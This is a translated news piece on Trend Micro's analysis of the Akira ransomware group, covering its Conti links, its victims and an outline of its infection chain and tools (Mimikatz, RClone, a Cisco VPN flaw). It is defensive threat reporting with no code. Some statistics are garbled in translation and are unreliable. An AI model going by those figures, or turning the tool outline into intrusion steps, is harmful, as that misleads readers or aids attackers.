South Westphalia's IT was attacked by the hacker group "Akira", which has meant that numerous local governments have only been able to work to a limited extent for weeks. The ransomware group encrypted server data and is now demanding a significant ransom, which is not paid. Akira, a new type of ransomware, only appeared in the spring. But who is actually behind the group? Trend Micro analyzes the background, techniques and tactics of this highly targeted successful group.
“Our analysis shows that the ransomware uses similar routines to Conti, such as obfuscating strings and encrypting files. It also avoids the same file extensions as Conti. The main motivation of Akira operators is apparently financial. The group uses double extortion tactics, stealing victims' important data before encrypting devices and files. Interestingly, those behind the scheme reportedly offer victims the option to either pay for file decryption or data deletion. Ransom demands typically range from $200.000 to more than four million,” said Richard Werner, business consultant at Trend Micro.
Who is actually behind the Akira ransomware group?
🔎 The countries with the most attack attempts per machine (May 1st to August 31st) (Image: Trend Micro).
Akira is rapidly becoming one of the fastest-growing ransomware families thanks to its dual extortion tactics, Ransomware-as-a-Service (RaaS) distribution model, and unique payment options. According to a report that analyzed blockchain and source code data, the Akira group appears to be linked to the now-defunct Conti ransomware gang. Conti, one of the most notorious ransomware families in recent memory, is believed to be the descendant of another prolific ransomware family, the highly targeted Ryuk ransomware.
As ransomware actors evolve their tactics and create increasingly sophisticated ransomware families, organizations must work to improve their cybersecurity to effectively defend against sophisticated threats.
Background to the APT group
The Akira ransomware emerged in March 2023 and is known to target companies in the United States and Canada. Their Tor Leak site features a unique retro look that, according to a report from Sophos, is reminiscent of "green screen" consoles from the 1980s that can be controlled by entering certain commands. In terms of code, today's malware is completely different from the Akira ransomware family that was active in 2017, although both have encrypted files with the same .akira extension.
As previously mentioned, the Akira operators are associated with Conti actors, which explains the similarities in the code, according to the Arctic Wolf Labs team. However, they also found that after the Conti source code was leaked, various malicious actors used it to create or optimize their own code, making tracing the ransomware families to Conti operators even more difficult.
Analysis shows similarity to Conti Group
🔎 The industries most affected by Akira attacks (May 1 to August 31) (Image: Trend Micro).
Trend Micro's analysis shows that the ransomware uses similar routines to Conti, such as string obfuscation and file encryption. It also avoids the same file extensions as Conti. The main motivation of Akira operators is apparently financial.
The group uses double extortion tactics, stealing victims' important data before encrypting devices and files. Interestingly, those behind the scheme reportedly offer victims the option to either pay for file decryption or data deletion. Ransom demands typically range from $200.000 to more than four million.
Recent activities also against Linux computers
In June 2023, just three months after the discovery, Akira expanded the list of targeted systems to include Linux computers. In August, incident responder Aura reported that Akira targeted Cisco VPN accounts that did not have multi-factor authentication (MFA). In early September, Cisco published a security advisory regarding attacks via the zero-day vulnerability CVE-2023-20269 in two VPN features of its products: Cisco Adaptive Security Appliance (ASA) and Cisco Firepower Thread Defense (FTD) Software.
🔎 The ten industries most frequently attacked by Akira (Image: Trend Micro).
Cisco reports that malicious actors exploiting CVE-2023-20269 can identify valid credentials that can be abused to establish unauthorized Remote Access VPN sessions and, for victims running Cisco ASA Software Release 9.16 or earlier, a clientless You can establish an SSL VPN session.
Recently, Sentinel One released a video analyzing an Akira ransomware variant called Megazord that emerged in August. This variant appears to be related to a Power Rangers formation as it encrypts files with the POWERRANGES file extension. The ransom note instructs victims to contact the ransomware actor via TOX Messenger.
Targeted regions and industries
Because Akira is new and highly targeted, there are not as many attacks as other established and widespread ransomware families. Trend Micro™ Smart Protection Network™ telemetry shows that France was the most affected by Akira, accounting for 53,1 percent of all detections. Most Akira victims do not belong to specific industries.
Akira's monthly detections show a significant increase in June 508 with 2023 attack attempts. The lowest detection rates were recorded in May with only three attack attempts in the entire month.
Targeted regions and industries based on the Akira Leak Site
🔎 This is how Akira's infection process works (Image: Trend Micro).
This is about data from the Akira Leak Site that reveals details about the companies targeted by Akira. This data, which represents a consolidation of Trend Micro's Open Source Intelligence (OSINT) research and leak site investigation, shows that Akira actors compromised 1 companies between April 31 and August 2023, 107. Most of Akira's victims - 85,9 percent of them, to be precise - were companies based in North America, followed by eight attacks in Europe.
We found that most victims were small businesses with 1 to 200 employees (59 victims). Medium and large companies follow in second and third place. Interestingly, according to the leak site's data, the most commonly targeted sectors are academia and professional services, closely followed by construction and materials.
Chain of infection and techniques
The ransomware typically gains access to victims' environments using valid credentials. The actors may collect the information from their partners or through other attacks. They use third-party tools such as PCHunter, AdFind, PowerTool, Terminator, Advanced IP Scanner, Windows Remote Desktop Protocol (RDP), AnyDesk, Radmin, WinRAR and Cloudflare's tunneling tool.
First access: Akira actors are known to use compromised VPN credentials for initial access. They have also been observed attacking vulnerable Cisco VPNs by exploiting CVE-2023-20269, a zero-day vulnerability affecting Cisco ASA and FTD.
Persistence: To do this, the actors create a new domain account on the compromised system.
🔎 The Akira infection chain based on an incident analyzed by Trend Micro (Image: Trend Micro).
Bypassing protection: The perpetrators also use PowerTool or a KillAV tool that abuses the Zemana AntiMalware driver to detect AV-related processes.
Exploration: The attackers also use tools such as PCHunter and SharpHound, AdFind along with Windows net commands, and Advanced IP Scanner and MASSCAN to collect information about the system.
Access to credentials: The attackers use Mimikatz, LaZagne, or a specific command line to collect credentials.
Lateral movements and command and control: Windows RDP serves the actors as a tool for lateral movements in the victim network. Using the third-party tool and web service RClone, stolen information is exfiltrated. They also use either FileZilla or WinSCP to distribute stolen information via File Transfer Protocol (FTP). Other tools in use include: AnyDesk, Radmin, Cloudflare Tunnel, MobaXterm, RustDesk and Ngrok.
Effects: The ransomware encrypts affected systems using a hybrid encryption algorithm that combines Chacha20 and RSA. Additionally, like most modern ransomware binaries, the binary has a feature that allows it to prevent system recovery by deleting shadow copies from the affected system. The original article contains a list of the folders that are not encrypted and a summary of the encryption details. There you will also find a list of MITER Tactics and Techniques as well as a tabular summary of the other malware, tools and exploits used.
More at TrendMicro.com
About Trend Micro As one of the world's leading providers of IT security, Trend Micro helps create a secure world for digital data exchange. With over 30 years of security expertise, global threat research, and constant innovation, Trend Micro offers protection for businesses, government agencies, and consumers. Thanks to our XGen™ security strategy, our solutions benefit from a cross-generational combination of defense techniques optimized for leading-edge environments. Networked threat information enables better and faster protection. Optimized for cloud workloads, endpoints, email, the IIoT and networks, our connected solutions provide centralized visibility across the entire enterprise for faster threat detection and response.